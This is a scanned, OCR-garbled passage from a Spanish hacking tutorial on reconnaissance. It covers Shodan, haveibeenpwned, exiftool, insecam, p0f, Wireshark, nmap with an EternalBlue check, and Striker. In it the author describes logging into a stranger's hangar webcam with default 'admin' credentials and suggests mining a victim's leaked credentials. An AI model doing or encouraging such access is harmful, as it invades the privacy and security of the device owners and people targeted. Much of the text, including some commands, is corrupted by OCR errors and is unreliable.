hackers”, y el “buscador más peligroso”, fue desarrollado en el 2009, y a diferencia 
de otros motores de búsqueda, Shodan busca información específica que puede ser 
muy útil para un hacker. 


Shodan toma banners, puertos y servicios, e información de la red, para 
ayudarte en la etapa de reconocimiento de forma que puedas obtener suficiente 
información como para empezar a planear un ataque contra algún sistema. 


Para hacer esto, Shodan se aprovecha que casi todo nuevo dispositivo hoy 
en día tiene una interfaz web que facilita la administración remota, y aquí es donde 
Shodan se aprovecha, todos los dispositivos que estén disponibles en la red: desde 
señales de tráfico, cámaras, servidores, routers, bases de datos y sin fin de dispositivos 
que pueden ser encontrados por Shodan y potencialmente comprometidos. Debido a 
esto, es el buscador favorito de los hackers e investigadores en ciberseguridad. Se ha 
documentado casos donde activos se ven comprometidos debido a fallas encontradas 
por este buscador. 


Para empezar a usar Shodan, lo primero que tienes que hacer es ingresar a 
https://shodan.io y crear una cuenta. 
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Exploits Scanhub Maps Blog Anniversary Promotion 


-sHooan i; 


EXPOSE ONLINE DEVICES. 


WEBCAMS. ROUTERS. 
POWER PLANTS. IPHONES. WIND TURBINES. 
REFRIGERATORS. VOIP PHONES. 


TAKE A TOUR 


DEVELOPER API 


Find oul 





Shodan tiene una versión de paga, pero a menos que lo uses funciones 
avanzadas, podrás acceder a la mayoría de sus funciones de forma gratuita. 


Ahora, al ingresar a Shodan, tendrás dos opciones principales, la primera es 
hacer una búsqueda específica, lo cual es particularmente útil si ya sabes tú objetivo 
(por ejemplo, servidores de algún tipo o en algún rango de IPs), y la segunda, es 
entrar a los “directorios de búsqueda” de Shodan, que te mostrará algunas de las 
búsquedas más comunes y recientes. 


Empezaremos por la segunda. 


Explore 


Video Games 
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Como puedes ver, podrías aqui utilizar las búsquedas recientes para encontrar 
camaras web, bases de datos, o sistemas de control industrial, incluso es posible 
entrar a cámaras de los semáforos. 


% Maps ae like 2,977 Š Download Results 


103,028 
ETTP/1.1 We OK 


TOP COUNTRIES > A me Bete: Med, 15 Jul 2218 34:39:02 SMT 
Server: Linunsz.x PaP: € Avtech/1.0 


i, 15 Aug 2814 86:82:34 DO 
Content-Type: tart/ntel 
ETag: MIES IA 
Content-Length: 16526 


ETTP/Y.1 200 OK 

Date: Tue, 17 Jul 2215 23:02:34 EMT 

Server: Limx/2.x UPAR st 8 Aytech/t.2 
Lonmection: close 

Last-Modified: Men, 15 Dec 2014 €8:55:82 GT 
Contess-Type: text/htel 

Teg. 121-18756-1438832702 

Content-Length: 18753 


TOR ORSAMIZATIONS 


PT Tethom indonesia a4 KITE/11 260 OK 
True Internet j = Gate: sèd, 18 Jal 2896 02:27: 

Telmex ARIES OR ZIEGTRT 22 3 Ste Server: Línux/z.x U?nPs} 2 avteck/}.@ 

388 Broadband X = 52. Consectios: close 

TM al > Last-Medified: Tue, 12 Dec 2818 05:49:95 QT 


TOP OPERATING SYSTEMS E Ia 
Content-Length: 13830 


Linux 2.6.x 
Windows 7 ar S 
Linx 24-28 


FTTP/1.1 Zee OK 
A e A E di A EDERT Date: wad, 35 Jul 20:4 94:05:23 GT 


Atech AYREOT wabwork camera i Server: Linux/2.x UPaP/t 2 Avytuch/3.2 


Apache htipd Tonmection: close 
‘Microsoft HS hited Lest-Modified: Med, 13 Jul 2816 84:33:25 ST 


Boa HITPA Content-Type: text/stel 





Al seleccionar una categoría, o hacer una búsqueda, te dará una pantalla 
similar a esta, en la que nos muestra cuantos activos encontró y de qué países, 
los banners que nos dan algo de información de su sistema (Linux, protocolos, 
servicios, etc.), y si hacemos clic en el título, por ejemplo en “:::LOGIN:::”, nos 
enviará a la página del activo, donde podríamos intentar entrar debido a alguna 
vulnerabilidad, o contraseña débil (es muy común que dejen las contraseñas/ 
usuarios de fabrica). 
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Live View | Setup | Help E 


Zoom wide I crossbar 


3 Righe 
2008 Wide E | =P Tele 


Zoom out to overview mage 


PAN tet ¡qe 








Este, por ejemplo, es una camara web dentro de un hangar de aviones, con 
control en java suficiente como para permitirme mover la camara y ver en vivo lo 
que esté pasando dentro del lugar (tal y como te lo imaginarias en una pelicula de 
Hollywood). 


Para entrar aqui, lo único que hice fue seleccionar una de las ligas, buscar 
las contraseñas/usuarios de fábrica posibles, e intentar todas las combinaciones 
(usualmente es “admin”, “admin” o algo similar), y me dio acceso. 


Ahora, una pequeña advertencia: dentro de este buscador se pueden 
encontrar dispositivos con información sensible como bases de datos, luces de 
tráfico, o cámaras de tráfico, entrar a estas, o manipularlas de cualquier forma 
sin permiso, podría meterte en problemas legales. 


Para encontrar algo en particular basta con hacer una búsqueda especifica en 
la barra de búsqueda, como, por ejemplo, especificar qué quieres un sistema Linux, 
o Windows, o con cierto banner de algún fabricante de software o hardware que 
desees atacar. 
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2.1.5 ¿Has sido hackeado? 


Esta herramienta, aunque muy sencilla, puede llegar a ser bastante útil, se 
llama haveibeenpwned, y puedes encontrarla en https.//haveibeenpwned.com. 


Tiene una base de datos de las filtraciones de datos de usuarios más grandes, 
como ha sido Dropbox, Adobe, LinkedIn, Yahoo!, entre otras, y en su buscador 
puedes buscar los correos electrónicos para ver si han sido filtrados en alguna de 
estas bases de datos. 


¿Para que pudiera servirte? Con esto podrías darte cuenta de los servicios a 
los que está registrado tu objetivo, y potencialmente hasta obtener alguna credencial 
vieja de este, si es que la encuentras en la base de datos. 


¿Para usar la herramienta, simplemente ingresa el correo electrónico de tu 
víctima, y haz clic en “pwned?” 


‘;--have i been pwned? 


Check if you have an account that has been compromised in a data breach 


w ¿0 hotmail.com! 





Si el correo ha sido comprometido, aparecerá en donde, cuando, y que ha 
sido comprometido en la parte de abajo, algo similar a este ejemplo de LinkedIn. 


Compromised data: i 





Esta herramienta también te puede ayudar a auditar que tan buena es tu 
seguridad personal, ya que, si tus proveedores son hackeados, tu información está 
comprometida. 
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2.1.6 Encontrar con que estan hechas las paginas web 


Builtwith es otra herramienta muy sencilla en la web, te ayudará a identificar 
con que tecnología fue creada una página web, lo cual es generalmente lo primero 
que verificó cuando estoy viendo como auditar a una página web. 


Find out what websites are 


Duitwith Built With 


i Enter a webs: 








Al poner en la búsqueda la página web, te dará una lista de tecnologías 
que utiliza, aquí puedes identificar fácilmente si está desarrollada con WordPress, 
Bootstrap o cualquier otra tecnología. 


Puedes entrar en https://builtwith.com 


2.1.7 Encontrar versiones anteriores de paginas web 


Archive, o también conocido como WayBackMachine, podria definirla esta 
herramienta cómo “la máquina del tiempo” del internet, en esta herramienta, a la 
cual puedes acceder en htips://archive.org, puedes realizar búsquedas de páginas 
web antiguas o versiones anteriores. 


Te podría servir para encontrar información, ligas o documentos que los 
administradores hayan borrado o corregido, pero tu podrás encontrar sus errores 
pasados si usas estas herramientas. 


Basta con escribir la URL de la página que deseas investigar. 


s E 
Wapak Machin a enter URL or keywords E 1 





Y te dara un calendario de paginas viejas que ha guardado la herramienta. 
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2 fe 
3007 10058 1000 2000 2001 2002 2003 2004 20058 208 207 2008 299 25% H 2012 23 24 





Si haces clic en cualquiera de esas fechas marcadas, puedes encontrar 
páginas web guardadas de esa fecha. 


2.1.8 Encontrar ubicaciones por medio de una foto 


A veces, nuestro objetivo sube fotos o archivos a la red, y no sabe que en 
ellos hay meta data, es decir, información no visible que es parte del archivo, que 
nos puede dar información importante. 


Por ejemplo, la meta data nos podría dar información del usuario que creó 
algún archivo, el sistema operativo que se utilizó para crearlo, cuando se creó, o 
incluso, a veces hasta ubicaciones de donde se tomó, por ejemplo, una fotografía. 


Para eso existen herramientas como exiftool, que toma los metadatos de una 
fotografía y te los muestra. Para utilizar la herramienta, basta con mandar llamar 
la herramienta, seguido de la dirección de la imagen en la que queremos encontrar 
información. 


# exiftoot foto.jpg 
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Podemos esperar una respuesta similar a esta: 


, Huffman coding 


06" W 


5 mm equivalent: 25.8 mm) 





Por ejemplo, en esta foto se pudo encontrar la ubicación geográfica de donde 
se tomó la foto en base a la meta data del archivo, también se obtuvo el nombre del 
dispositivo que la tomo, y el modelo del móvil con el que se tomó. 


2.1.9 Entrar a cámaras de seguridad 


Este es otro buscador, te muestra cámaras web en vivo que puedes acceder 
directamente, y cierto, en Shodan podrías encontrar lo mismo, pero no con tanta 
facilidad ni confiabilidad, aquí todas las cámaras están 100% abiertas sin esfuerzo. 


Por ejemplo, busque México, y me muestra todas las cámaras en México que 
están abiertas: 


IP cameras: Mexico 


fe vn += | 
B 
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Este servicio es más para demostración de todas las cámaras que se pueden 
encontrar y entrar, por ejemplo, en Monterrey hay algunas disponibles dentro de 
oficinas de empresas, las cuales podrían poner en riesgo la seguridad de dichas 
empresas. 


Puedes entrar en https: //www.insecam.org/ . 


2.1.10 Rastreo de IP e información en email 


A veces vas a lograr obtener información tal como la IP o incluso un correo 
electrónico, y desde ese punto puedes sacar más información. Por ejemplo, si tienes 
una IP, podrías sacar información de qué ciudad proviene y hasta potencialmente (si 
es una IP asignada a una empresa) de que empresa vino y donde está localizada, para 
esto, podrías usar servicios tales como https://ipinfo.io y simplemente ingresar en el 
buscador la IP que quieras encontrar. 


Por otro lado, es posible obtener información adicional de la meta data de un 
correo electrónico, para hacer esto, basta con abrir el correo electrónico, y ponerle 
en la opción de “ver original”. 


El ejemplo demostrado es de Gmail, pero Outlook y las otras alternativas 
también tienen una opción similar. 





De esta pantalla puedes darte cuenta de información que se puede obtener, 
como la IP desde donde se envió (lo cual podría delatar el servidor SMTP), pero, la 
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información interesante está en la parte inferior, en donde podrás obtener todavía 
más información, incluyendo si al enviarse el servidor cuenta con encriptación o no. 


Original Message 


Message iD 


AS E O e 
Created at 


Fri, Jus 2 3018 at 4:21 PM (Delivered after 173 seconds) 


Fo: See Rages. ee A ote 


Subject AR AOR EO A Re ees Gey 
NEUTRAL with iP << 8 Leam more 


‘PASS with domain See: teeta Lean more 





Se ve como informacion inutil y poco entendible a primera vista, sin embargo, 


al copiar y pega el código en esta dirección como https://whatismyipaddress.com/ 
trace-email, podría empezar a hacer más sentido. 


Trace Email Analyzer 


Paste the header you've copied in the box. 











Find Email Sender 


Basta con pegar el código de los metadatos en esta caja y presionar el botón 
rojo. 
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2.1.11 Reconocimiento en red pasivo 


A veces necesitas obtener información de sistemas dentro de tu red local, 
o que están haciendo conexiones con tu sistema, para esto, existe una herramienta 
llamada POF. 


Lo que hace POF, es que interpreta los paquetes que entren a la interfaz, e 
intenta interpretarlos para obtener de qué sistema fueron enviados. 


Para utilizar POF en Kali, basta con escribir el comando pOf -i <interfaz>, 
en donde <interfaz> es el nombre de interfaz en el que vas a escuchar los paquetes. 


:~# pOf -i etho 


Ahora, esto solo está escuchando e interpretando paquetes en tu interfaz, 
así que por sí solo probablemente no te será útil, sin embargo, combinado con otras 
herramientas, como por ejemplo ettercap, que se ve en capítulos posteriores, te 
podría ser muy útil. 


Como respuesta, podrías esperar de esta herramienta algo similar a lo 
siguiente: 


.-{ 192.168.1.67/60144 -> 35.166.234.151/443 (syn) ]- 


192.168.1.67/60144 

Linux 3.11 and newer 

0 

none 
4:64+0:0:1460:mss*20,7:mss,sok,ts,nop,ws:df,id+:0 


client 
os 


params 


l 

| 

| 

| dist 
| 

| raw sig 
| 





Que como ves, te muestra la IP y puerto de donde se mandó el paquete syn, 
y el posible sistema operativo a donde pertenece este paquete. 


2.1.12 WireShark - Análisis de paquetes 


Wireshark es una de las más grandes herramientas para ingenieros en 
software y hackers, esencialmente es un analizador de paquetes, es decir, captura 
todos los paquetes en la interfaz que le mencionas, y te muestra cada detalle de estos 
en base al modelo OSI. 


Para ejecutarlo, basta con escribir WireShark en la terminal o abrir la 
aplicación por su icono. 
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Al abrirse, te aparecerá una pantalla similar a la siguiente, en donde te 
muestra varias interfaces que podrías seleccionar para interceptar paquetes en estas 
interfaces. 








Antes que selecciones una, quiero que te vayas a la pestaña de Edit > 
Preferencias, y aquí hacer clic en protocols, estos son todos los protocolos que 
WireShark conoce y acepta, adicionalmente, si haces clic en uno, podrás ver que en 
algunos puedes modificar algunos factores como ingresar llaves de desencriptación 
para desencriptar los paquetes que entren bajo ese protocolo. 


En la imagen muestro como podemos interceptar paquetes wifis en el 
protocolo IEEE 802.11, e ingresar claves de desencriptación WEP y WPA. 


8 View Go Capture Analyze Statistics Telephe 


Display hidden protocol Rems 

- Display byte fieids with a space character between bytes 
Look for incomplete dissectors 
Enable stricter conversation tracking heuristics 





Configuration Profiles... 


Preferences. CtrisShitte?. 
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Ok, ahora si, en la primera imagen, haz clic en la interfaz que estés utilizando 
(probablemente es donde veas más líneas activas) y haz clic en el botón de la aleta 
azul 4, o simplemente haz doble clic en la interfaz. 


Inmediatamente empezara WireShark a mostrarte todos los paquetes 
capturados en la siguiente pantalla. 











85 3 463836797 
08 3. 

er ssnrzeexe 
68 3. 489788391 
QR A AEATISINN 
79 3 58210766% 
21 3-798759074, 


g 5 
2 a etacceTes? sade 


des sisis = sists Leet 
139 Srangara query Maadi PIR —SIGAB2S. sui. pooglacast cop socal, "GE" question PTR SECOND, local, “Que 
qa saniar d quer ee En 3 NPESE FCF A7999 20CHECDI302 IBAF EF cz. 2 BOON ECES., IE Fier genstion Pim eranen 
(3197 bits) on interface 
adent: 28 (98:37:ba:4drat:20) 


» Micro: 
‘internet Protocol Version & sre: 192. 
» Jransedasión Control Protocol, sre por! A |, Seq: 1, Ack: Z993, Len: 99 





Quizás podría verse al inicio un poco intimidante, pero, realmente es 
bastante sencillo de interpretar, la barra de navegación de arriba te permite filtrar 
los paquetes en base a tipo de protocolo, fuente o destino del paquete (de donde o a 
donde se envió), puerto utilizado para enviar o recibir, entre otras cosas, un ejemplo 
podría ser si escribes http en el filtro, te mostrará todos los paquetes enviados en 
el protocolo http, que son usualmente paquetes en un navegador, y si escribes por 
ejemplo ip.sre==<ip>, te mostrará todos los paquetes que se mandaron desde la 
fuente de la IP que hayas especificado, ip.dst==<ip> muestra los paquetes que se 
hayan mandado a esa IP. 


Por otro lado, puedes ver más detalles de un paquete en la sección inferior (la 
gris), que muestra por capas del modelo OSI, La información de ese paquete, desde 
los bits, hasta lo que está dentro del paquete. 


En el ejemplo siguiente, analizando el paquete HTTP, podemos ver de qué 
dirección MAC a que dirección MAC se envió, luego, que se envió de la dirección IP 
192.168.1.83 a otra dirección IP, que es un paquete TCP que se envió desde el puerto 
51326 al 80, y finalmente que es un paquete en el protocolo HTTP, y dentro de esta 
sección, el método HTTP que utilizo, y el contenido de este. 


iv Frame 72: 149 bytes on wire (1192 bits), 149 bytes captured (1192 bits) on interface © 

o Ethernet II, Src: Micro-St_7f:7f:2e (4c:oc:ba:7F:7f: ee), pst: Shenzhen 4d:af:28 (d8:37:be:4d:af:28) 
iv Internet Protocol Version 4, Src: 192.158.1.83, Dst: © = 
+ Transmission Control Protocol, Src Port: 51326, Dst Port: 86, Seq: 3, Ack: 286, Len: 95 






Full request URI: $ 
a terre request 2727 aa 
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Para este punto ya te habrás dado cuenta de que Wireshark te da mucha 
información de la data que se transmite por tu interfaz, pero de seguro te preguntarás: 
¿En qué me sirve? Bueno, al hacer una prueba de penetración o incluso asegurando 
una red, esta información se vuelve extremadamente relevante, por ejemplo, 
si entiendes como funciona un ataque, podrías interpretar de los paquetes si está 
sucediendo uno y desde donde. 


Por medio de WireShark, en los siguientes capítulos veremos cómo realizar 
espionaje en una red, y por medio de WireShark podrías identificar si alguien está 
haciendo este tipo de ataques en tu red fácilmente (lo mencionare al llegar a ese tema). 


También, imaginemos que estás intentando identificar a donde se conecta 
alguna aplicación tuya, o un malware en un ambiente controlado tuyo, podrías obtener 
esa información fácilmente mientras que los paquetes pasen por la misma interfaz, 
WireShark incluso puede ser utilizado junto con herramientas de intercepción de data 
para hacer que paquetes de otros sistemas pasen por nuestra interfaz, de forma que 
podamos espiarlos, incluso podríamos utilizar interfaces fuera del internet, como un 
SDR para emular una red móvil e intervenir mensajes de texto o llamadas telefónicas, 
pero eso es algo más avanzado, el punto aquí es que WireShark es una herramienta 
bastante completa y poderosa, y vale la pena que lean más al respecto, ya que tendría 
que escribir un libro completamente dedicado a WireShark para explicarlo de lleno. 


Mientras te dejare una fuente donde puedes leer de otros tipos de comandos 
para filtrado de paquetes. 


https: //wiki.wireshark.org/DisplayFilters 


2.2 RECONOCIMIENTO ACTIVO 


Ya que terminamos de realizar reconocimiento de forma pasiva, sigue el 
reconocimiento activo, igual que el reconocimiento pasivo, tiene algunas ventajas y 
desventajas. 


La principal ventaja y razón por lo que esto también es indispensable, es 
que este tipo de reconocimiento es altamente confiable, y nos dirá cosas esenciales, 
como sistema operativo, puertos, servicios, e incluso aquí podremos empezar a 
identificar vulnerabilidades, la desventaja del reconocimiento activo es que aquí 
vamos a “tocar” directamente a los objetivos, entonces si no somos cuidadosos, nos 
puede detectar algún IDS o IPS y bloquear el acceso fácilmente. 


También, es importante mencionar, que esta actividad es sensible, es decir, 
si escaneas un sistema sin permiso, estas realizando actividades potencialmente 
ilegales y puedes meterte en problemas. 
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2.2.1 Nmap 


Nmap, a veces llamado la navaja suiza del hacking, es una herramienta 
escrita en Python para escaneo y reconocimiento de sistemas. 


Es decentemente fácil de usar, pero increíblemente poderosa, el fundamento 
de nmap, es que manda paquetes TCP o UDP, y analiza las respuestas del sistema a 
estos paquetes, y con su base de datos, asume información del sistema, pero a pesar 
de que son asunciones, tiene un alto grado de confiabilidad. 


Por ejemplo, digamos que quisiéramos saber qué servicios está corriendo 
el sistema en scanme.nmap.org (escaneamos este sistema ya que tenemos permiso 
explícito para hacerlo, si hiciéramos esto con otro sistema, a menos que sea 
nuestro, estaremos cometiendo un acto ilegal). Lo que sucede con este scan, es 
mandar paquetes TCP SYN a todos los puertos donde potencialmente el sistema 
esté corriendo los servicios, cuando responde que sería en ACK/SYN, significa que 
ese puerto está siendo utilizado, y el servicio default en ese puerto es el que más 
probable está siendo utilizado (recordemos que los servicios corren por defecto en un 
puerto en específico, por ejemplo, el HTTP en el 80, el SSH en el 22, etc.). 


Para hacer lo que previamente describí, basta con escribir el comando nmap 
-sV scanme.nmap.org 


:~# nmap -sV scanme.nmap.org 


Quiero que pongas atención a la estructura para utilizar nmap. Primero, 
escribiremos el nombre de nmap para mandar a llamar la herramienta, luego 
escribimos el comando que se va a utilizar, representado por un guión, seguido de 
letras que representan algo que quieres que haga la herramienta, en este caso fue 
-sV, que significa “service version” (versión de servicios), y, por último, le damos el 
objetivo al cual va a escanear. 


No tiene que ser un dominio, puede ser una IP. o varias. También, puedes pedir varias 
- acciones en el mismo comando, de cualquier forma, puedes considerar esto como la 
estructura de utilización de nmap: nmap -<comando> <objetivo> 





Luego de realizar ese comando, recibimos una respuesta, aquí podemos ver 
que nos muestra lo que pedimos en orden. 


Primero nos muestra la IP que fue escaneada, y si está disponible, seguido de 
cuatro columnas, que nos muestra el puerto que se detectó abierto, y si es un puerto 
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tcp o udp, el estado en el que se encuentra, el servicio que está corriendo en este 
puerto, y la versión de este servicio. 


Nmap scan report for scanme.nmap.org (45.33.32.156) 
i (0.051s latency 
resses for scanme.nmap.org (not scanned): 2600:3c01::f03c:91ff:fel8:bb2f 
995 closed ports 
STATE SERVICE VERSION 
open OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.18 (Ubuntu Linux; protocol 2.0) 
filtered p 


SH 
open http Apache httpd 2.4.7 ((Ubuntu)) 
open nping-echo Nping echo 
31337/tcp open tcpy, ped 
Service Info: OS: Linux; CPE: cpe:/o:tinux:linux kernel 


Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . 
Nmap done: 1 IP address {1 host up) scanned in 8.94 seconds 





Algo importante que mencionar es que nmap por defecto, escanea los 1000 
puertos mas comunes, asi que si quieres escanear un puerto/servicio que sea poco 
común, deberías decirselo explícitamente. 


La práctica anterior sirve de cierta forma para encontrar información de un 
sistema externo, si por ejemplo quieres escanear a un sistema en tu red local ¿qué se 
hace? Esto es todavía más sencillo, primero, te interesaría saber si en sí, el sistema 
está “vivo” en la red, para esto, basta con escribir el comando nmap -sP <IP>/24, 
esto lo que hará es que escaneará todas las IPs dentro de ese segmento y te dirá quien 
está recibiendo y mandando respuestas. 


:~# nmap -sP 192.168.1.1/24 


En las direcciones IPV4, cada numero representa 8 bits, por lo que decirle 
que escanee 24 bits, lo que significa que escanee a 3 digitos, que son los que estan en 
ese segmento de la red, pero pudiste haber puesto simplemente un rango, algo como 
192.168.1.0-254 y habria sido lo mismo. 


Podrás esperar como respuesta algo similar a esto 


ARP Ping Scan Timing: About 1.96% done; ETC: 16:06 (0:00:50 remaining) 
Nmap scan report for 192.168.1.70 

Host is up (0.0014s latency). 

y Address: 9C:B6:D0:10:85:81 {Rivet } irks) 

Nmap scan report for 1 bed 

Host is up (0.008 ) 

MAC Address: :BE: {Tp-link Technologie 

Nmap scan report for 5 .1.83 

Host is up (6.06 


MAC Address: 4C:CC (Micro-star Intl) 
f 1 
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Esta acción es lo primero que harías en una red local, y si, no te da una 
cantidad inmensa de información de todos los sistemas, pero te dice cuántos sistemas 
están en la red, y utiliza paquetes ARP (que son menos comúnmente filtrados) para 
hacerlo. 


Seguido de eso, tu siguiente pregunta en una red local debería de ser ¿qué 
sistema operativo tienen esos sistemas? Para esto, utilizamos un comando similar, 
pero con la opción -O, algo así como nmap -O <IP>/24, lo que hace este comando, 
es que obtiene los servicios del sistema, y hace una correlación entre ellos y los 
sistemas operativos en la base de datos, dándote un sistema operativo “estimado”, 
pero con decente confiabilidad. 


:-# nmap -0 192.168.1.1/24 


Este es un ejemplo del resultado que obtendrías, como puedes notar, te 
muestra los puertos y servicios, seguido de una “estimación” del sistema operativo, 
lo que sucede, es que no existe un “paquete” que puedas mandar para “preguntar” 
el sistema operativo, entonces lo que hace nmap es preguntar ¿qué servicios tiene 
corriendo el sistema, y preguntar a su base de datos “que sistemas operativos usan 
estos servicios?” y te da la respuesta a ello. 





2.2.1.1 SCRIPTS DE NMAP 


Ya vimos un poco de lo que puede hacer nmap, sin embargo, hay miles de 
otras funciones que tiene nmap, desde encontrar vulnerabilidades, hasta escanear 
para detectar firewalls o sistemas de seguridad, funciones para evadir sistemas de 
seguridad. 


Para esto, vale la pena hablar de los scripts de nmap, que están en su base de 
datos oficial, para utilizarlo, deberás ir a https: //nmap.org/nsedoc/index.html , donde 
encontraras lo siguiente: 
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NSEDoc 


index 
NSE Documentation 


Categories 


auth 
broadcast 
brute 
default 
discovery 
dos 
exploit 
external 
fuzzer 
intrusive 
malware 
safe 
version 
vuln 





Estas son las categorias para las que nmap ha desarrollado scripts 
especializados, por ejemplo, vamos a imaginar que encontramos una maquina con 
Windows 7, queremos identificar si tiene la vulnerabilidad Eternalblue, unas de las 
vulnerabilidades mas comunes en este sistema operativo, podriamos simplemente 
irnos al buscador que esta a la izquierda de la pagina y escribir Eternal Blue. 


eternalblue 
Search Results 


Adout 43 results {0.14 seconds} 


smb-yuin-ms17-040 NSE Script 
hips dinmap.crgnsedoc/scripts/smb-yuin-ms 17-10 .himi 
Attempts to detect fa Microsof SMBv1 server is vulnerable to a remote code execution wuinerability (ms17-910, a.k.a. EternatBlue). The vulnerability is actively f 





Hacer clic en el script que hara el escaneo para dicha vulnerabilidad y leer 
los detalles de cómo se utiliza en la página inferior de la página. Lo que más nos 
interesa es el ejemplo de uso y los argumentos posibles. 


Example Usage 


e nmap -p445 --script smb-vuln-ms17-919 <target> 


e nmap -p445 --script vuln <target> 
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Y simplemente lo probamos, en mi caso el sistema Windows 7 en mi red 
tiene la IP 192.168.1.141, asi que escribo nmap -p445 --script smb-vuln-ms17-010 
192.168.1.141 





:~# nmap -p445 --script smb-vuln-ms17-616 192.168.1.141 


Y como respuesta, obtendras algo como esto, en lo que mi principal interés 
es si dicha maquina aparece con la palabra VULNERABLE, y dado que es el caso, 
podemos asumir que un ataque con este exploit comprometeria a la maquina. 


Nmap scan report for 192.168.1.141 
Host is up (0.00027s latency}. 


PORT STATE SERVICE 
445/tcp open microsoft-ds 
MAC Address: 00:0C:29:BE:D4:77 (VMware) 


Host script results: 
mb-vuln-ms17-010: 


Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010) 
State: VULNERABLE 
IDs: CVE:CVE-2017-0143 
Risk factor: HIGH 
A critical remote code execution vulnerability exists in Microsoft SMBv1 
servers (ms17-010). 


Disclosure date: 2017-03-14 

References: 
https: //blogs.technet .microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt -attacks/ 
https://cve.mitre.org/cgi-bin/cven cgi?name=CVE-2017-0143 
https://technet.microsoft.com/en-us/library/security/ms17-010.aspx 


Nmap done: 1 IP address {1 host up} scanned in 0.69 seconds 





Así como este, hay cientos de exploits que podrías utilizar para obtener toda 
clase de información de los sistemas que vayas a auditar, simplemente tienes que 
saber que buscar, como y donde en la base de datos de nmap. 


2.2.1.2 ESTADOS 


En nmap, de seguro notaste algo llamado STATE en el escaneo de servicios, 
esto se refiere al estado en el que está dicho puerto, estos son los estados que puede 
estar y que significan. 


OPEN/ABIERTO 


Esto significa que el servicio está aceptando paquetes TCP, UDP o SCTP en 
este puerto. Estos son los puertos que más nos interesan, ya que cada puerto abierto 
es una potencial entrada a un ataque. 
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CLOSED/CERRADO 


Esto significa que el puerto es accesible, sin embargo, no hay servicio que 
responda en este puerto. Esto es útil para saber si el objetivo está activo, y ayuda 
en la detección de sistema operativo, también, vale la pena monitorearlos, ya que 
podrían abrirse si se inicia el servicio en el sistema. 


FILTERED/FILTRADO 


Esto sucede cuando nmap no puede determinar si el puerto está abierto 
debido a que los paquetes que manda nmap están siendo filtrados. Esto podría ser 
debido a un firewall, es el tipo de estado que más frustra un ataque. 


UNFILTERED/NO-FILTRADO 


El estado no filtrado significa que el puerto es accesible, pero nmap es incapaz 
de determinar si está abierto o cerrado. Solo el escaneo de paquetes ACK, que se 
utiliza para identificar reglas del firewall, clasifica puertos en este estado, podrás 
encontrar más información al escanear el mismo puerto con otro tipo de escaneo, tal 
como SYN o FIN, para determinar si el puerto está abierto o cerrado. 
OPEN|FILTERED/ABIERTO|FILTRADO 

Nmap da este estado cuando no puede identificar si el puerto está abierto o 
filtrado. Esto pasa cuando los puertos abiertos no dan respuesta. 
CLOSED|FILTERED/CERRADO|FILTRADO 

Esto sucede cuando nmap no es capaz de determinar si un puerto esta cerrado 


o filtrado, sucede para el escaneo “IP ID idle”. 


2.2.1.3 OTROS COMANDOS DE NMAP 


Las IP y puertos son ejemplos, se debe usar la apropiada para tu caso en específico. 
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Comando Descripción 


Selección de obj / escaneo 





Tipos de escaneos de puertos 


2.2.2 OSINT + Reconocimiento Activo - Obtener información con una sola 
herramienta 


Striker es una herramienta escrita en Python parecida a Discover, ya que 
obtienen cosas muy parecidas, pero la diferencia clave es que Striker no tiene opción 
para reconocimiento 100% pasivo, y dentro de las acciones que hace, realiza con 
nmap un escaneo de puertos, por lo que tengo que clasificarlo como reconocimiento 
activo. 


La ventaja que tiene sobre Discover, es que la información la obtiene mucho 
más rápido (en mi experiencia tiene un poco menos de confiabilidad, lo uso cuando 
no tengo tanto tiempo). 
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Otra diferencia clave, es que Striker solo permite reconocimiento en 
dominios. 


Para utilizarlo, deberás ir a la carpeta en la que está la herramienta, que es / 
opt/Reconocimiento/Striker 


Dentro de ahí, tienes que darle permiso con chmod +x striker.py, y 
finalmente ejecutar el script con ./striker.py 


riker# ./striker.py 





Luego de ejecutarlo, te pedirá un dominio en donde se realizará el 
reconocimiento. 





Enter the target: | 


Luego de darle el dominio, empezará a mostrar resultados, como, por 
ejemplo: 
Probabilidad de honeypot 
CMS 
Información Whois 
Robots.txt 
Escaneo de servicios 
Records DNS, MX, Hosts(A ), TXT 
Mapa DNS 
Correos electrónicos 


Hosts 


NN E ge AS 


foma 


Ligas vulnerables a SQLi 


Generalmente el escaneo no toma más de un par de minutos, así que, para la 
información obtenida, la considero una herramienta bastante útil. 


ANALISIS DE VULNERABILIDADES 


En la etapa de análisis de vulnerabilidades se utilizan distintas herramientas 
para determinar los puntos débiles de un sistema, y por donde podríamos atacar. 


Generalmente lo que estamos buscando es una vulnerabilidad, es decir, un 
punto débil documentado para el que existe un ataque que podamos utilizar para 
comprometer la seguridad del sistema. 


3.1 CVES Y CWES 


Las vulnerabilidades las conocemos debido a que existen organizaciones e 
investigadores en seguridad informática que las documentan y reportan, y el formato 
en el que documentan y reportan dichas vulnerabilidades, se llama CVE, o sea 
Common Vulnerabilities and Exposures, dentro de un código CVE es donde se 
pueden encontrar todas las vulnerabilidades reportadas, es muy importante entender 
esto, debido a que todos los analizadores de vulnerabilidades utilizan este formato 
para mostrarte las vulnerabilidades del sistema. 


Existen varias bases de datos donde podrías encontrar estos CVEs, como, 
por ejemplo: 


Y http://cve.mitre.org/ 
Y Ittps://www.cvedetails.com/ 
Y https://nva.nist.gov/ 


Dentro de estas bases de datos, podrás encontrar vulnerabilidades reportadas. 
Están catalogadas en este formato: CVE-año-ID, y en algunas de estas bases de 
datos hasta te da fuentes de que ataques y herramientas que pueden explotar dichas 
vulnerabilidades. 
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Sin embargo, no todas las vulnerabilidades son iguales, algunas son mas 
peligrosas que otras, para clasificar esto, existe el CVSS, que clasifica del cero al 
diez y que tan peligrosa es una vulnerabilidad. 


Distribution of all vulnerabifities by CVSS Scores 
‘CVSS Score Number Of Vulnerabilities Percentage 
2.80 


























El CVSS cataloga a las vulnerabilidades dependiendo de la categoría: 
la confidencialidad, integridad, disponibilidad, y que tan difícil es que esta 
vulnerabilidad sea utilizada. 


Puedes utilizar esto para determinar el nivel de riesgo de una organización, 
combinando los niveles de CVSS con otros factores. 


= CVSS Scores & Vulnerability Types 


CVSS Score Ces 


Confidentiality Impact Compiet 


There is total inforrnation disclosure, restiting in ail system files being revezied.) 

Integrity Impact Compiete (There is a tota: compromise of system integrity. There is a complete loss of system protection, resulting in the entire system being 
compromisad ) 

Availability Impact 





